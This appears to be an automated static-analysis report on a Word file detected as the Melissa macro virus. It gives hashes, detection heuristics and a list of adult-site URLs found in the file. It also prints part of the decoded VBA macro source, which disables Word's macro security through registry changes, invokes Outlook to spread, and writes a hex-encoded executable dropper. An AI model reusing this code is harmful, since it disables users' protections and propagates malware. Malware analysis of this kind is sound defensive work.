Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 68450b344d6f22b1…

MALICIOUS

Office (OLE)

Size: 123.5 KB
Created: 2000-03-06 09:11:00
Authoring application: Microsoft Word 9.0
First seen: 2012-06-14
MD5: 6ea6b9ba4fd7a85baccdb2bdd44e1bfb
SHA-1: 930d3f726269c6559cbd6f709dfb586df1a202de
SHA-256: 68450b344d6f22b12fcaa83ff3ccf8dc11394687173a434e6071fe993dc7a4f4
Risk Score: 322

Heuristics 7

  • ClamAV: Doc.Trojan.Melissa-7 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Melissa-7
  • VBA macros detected [medium] OLE_VBA_MACROS (4 related findings)
    Document contains VBA macro code
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro [high] OLE_VBA_DOCOPEN
    Document_Open macro
  • CreateObject call [high] OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where the visible source is unavailable.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://www.cyberclub.com/ignite/members  [In document text (OLE body)]
    • http://hotbox.danni.com/hotbox/  [In document text (OLE body)]
    • http://www.powerflow.com/members/135798642.html  [In document text (OLE body)]
    • http://www.allasians1.com/membersonly/gallery/  [In document text (OLE body)]
    • http://www.breathlessbabes.com/protected  [In document text (OLE body)]
    • http://www.caughtceleb.com/cmlogin.html  [In document text (OLE body)]
    • http://www.pornmountain.com/members  [In document text (OLE body)]
    • http://www.sexillustrated.com/1stquarter/members2.htm  [In document text (OLE body)]
    • http://www.redlight.com/members  [In document text (OLE body)]
    • http://www.freeamsterdamsex.com/members  [In document text (OLE body)]
    • http://www.itouchmyself.com/members/index.html  [In document text (OLE body)]
    • http://www.dixiecam.com/members/  [In document text (OLE body)]
    • http://www.itsreal.com/members  [In document text (OLE body)]
    • http://www.111sexstreet.com/private/sex02.html  [In document text (OLE body)]
    • http://teenlabs.com/reactor/reactor1.htm  [In document text (OLE body)]
    • http://www.sweet18.com/home.html  [In document text (OLE body)]
    • http://members.campusbabes.com/  [In document text (OLE body)]
    • http://www.sextv.com/members/index.html  [In document text (OLE body)]
    • http://www.smutheaven.com/m/members.html  [In document text (OLE body)]
    • http://www.creamythighs.com/members/  [In document text (OLE body)]
    • http://www.celebrity-hardcore.com/members/index.html  [In document text (OLE body)]
    • http://www.dirtyonline.com/membersonly/  [In document text (OLE body)]
    • http://www.sexpaige.com/members/mem_home.html  [In document text (OLE body)]
    • http://members.sexy-photos.com  [In document text (OLE body)]
    • http://www.cybersex.com/members/index.html  [In document text (OLE body)]
    • http://members2.5starerotica.com/index.html  [In document text (OLE body)]
    • http://www.virtualhardcore.com/pictures/index.html  [In document text (OLE body)]
    • http://www.sexxx-drive.com/members/index.html  [In document text (OLE body)]
    • http://www.sizzle.com/members/index.shtml  [In document text (OLE body)]
    • http://www.lesbiansonly.com/members.htm  [In document text (OLE body)]
    • http://members.maturewomen.com/  [In document text (OLE body)]
    • http://www.sexualeuphoria.com/members/archives/index.html  [In document text (OLE body)]
    • http://www.pureteens.com/members  [In document text (OLE body)]
    • http://www.extremeadultsex.com/members  [In document text (OLE body)]
    • http://www.sexroom.net/members/  [In document text (OLE body)]
    • http://amazingonline.com/membersdox/  [In document text (OLE body)]
    • http://www.venusonline.com/tricia/Members/index.htm  [In document text (OLE body)]
    • http://www.chickflicks.com/m/members.html  [In document text (OLE body)]
    • http://www.valuesex.com/valuesexmembers/main.html  [In document text (OLE body)]
    • http://www.xxxensation.com/cgi-sec/xxxlogin  [In document text (OLE body)]
    • http://www.kingporno.com/authorized/  [In document text (OLE body)]
    • http://www.erotic-express.com/member/eng/  [In document text (OLE body)]
    • http://www.sexualeuphoria.com/members/index.html  [In document text (OLE body)]
    • http://members.celebs-n-models.net/babes/  [In document text (OLE body)]
    • http://www.erosnet.com/home.html  [In document text (OLE body)]
    • http://www.manhole.com/members/index.html  [In document text (OLE body)]
    • http://www.cyberstrip.com/members/html/members.cfm  [In document text (OLE body)]
    • http://www.corinadine.com/members/index.html  [In document text (OLE body)]
    • http://www.Shockingpink.com/members/tina1.html  [In document text (OLE body)]
    • http://www.adultpleasures.com/members/  [In document text (OLE body)]
    +21 more URL(s)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 56432 bytes
SHA-256: 1b21b7e5ac699f083fbe6a22317e90838385dc41a8e4a40738869dd7c9b360cb
Detection: ClamAV: Doc.Trojan.Melissa-4
Obfuscation or payload: unlikely

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "Melissa"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
On Error Resume Next
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then
CommandBars("Macro").Controls("Security...").Enabled = False
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
Else
CommandBars("Tools").Controls("Macro").Enabled = False
Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1): Options.SaveNormalPrompt = (1 - 1)
End If
Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice
Set UngaDasOutlook = CreateObject("Outlook.Application")
Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI")
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") <> "... by Kwyjibo" Then

Open "xtianpig.scr" For Output As #1
Print #1, "N BASTARD.COM"
Print #1, "E 0100 4D 5A 50 00 02 00 00 00 04 00 0F 00 FF FF 00 00"
Print #1, "E 0110 B8 00 00 00 00 00 00 00 40 00 1A 00 00 00 00 00"
Print #1, "E 0120 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 0130 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00"
Print #1, "E 0140 BA 10 00 0E 1F B4 09 CD 21 B8 01 4C CD 21 90 90"
Print #1, "E 0150 54 68 69 73 20 70 72 6F 67 72 61 6D 20 6D 75 73"
Print #1, "E 0160 74 20 62 65 20 72 75 6E 20 75 6E 64 65 72 20 57"
Print #1, "E 0170 69 6E 33 32 0D 0A 24 37 00 00 00 00 00 00 00 00"
Print #1, "E 0180 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 0190 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 01A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 01B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 01C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 01D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 01E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 01F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 0200 50 45 00 00 4C 01 04 00 66 28 01 3E 00 00 00 00"
Print #1, "E 0210 00 00 00 00 E0 00 8E 81 0B 01 02 19 00 02 00 00"
Print #1, "E 0220 00 24 00 00 00 00 00 00 1C 34 00 00 00 10 00 00"
Print #1, "E 0230 00 20 00 00 00 00 40 00 00 10 00 00 00 02 00 00"
Print #1, "E 0240 01 00 00 00 00 00 00 00 03 00 0A 00 00 00 00 00"
Print #1, "E 0250 00 60 00 00 00 04 00 00 00 00 00 00 02 00 00 00"
Print #1, "E 0260 00 00 10 00 00 20 00 00 00 00 10 00 00 10 00 00"
Print #1, "E 0270 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 0280 00 40 00 00 EE 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 0290 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 02A0 00 50 00 00 14 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 02B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 02C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 02D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 02E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 02F0 00 00 00 00 00 00 00 00 43 4F 44 45 00 00 00 00"
Print #1, "E 0300 00 10 00 00 00 10 00 00 00 02 00 00 00 06 00 00"
Print #1, "E 0310 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60"
Print #1, "E 0320 44 41 54 41 00 00 00 00 00 20 00 00 00 20 00 00"
Print #1, "E 0330 00 20 00 00 00 08 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 0340 00 00 00 00 40 00 00 C0 2E 69 64 61 74 61 00 00"
Print #1, "E 0350 00 10 00 00 00 40 00 00 00 02 00 00 00 28 00 00"
Print #1, "E 0360 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0"
Print #1, "E 0370 2E 72 65 6C 6F 63 00 00 00 10 00 00 00 50 00 00"
Print #1, "E 0380 00 02 00 00 00 2A 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 0390 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00"
Print #1, "E 03A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 03
... (truncated)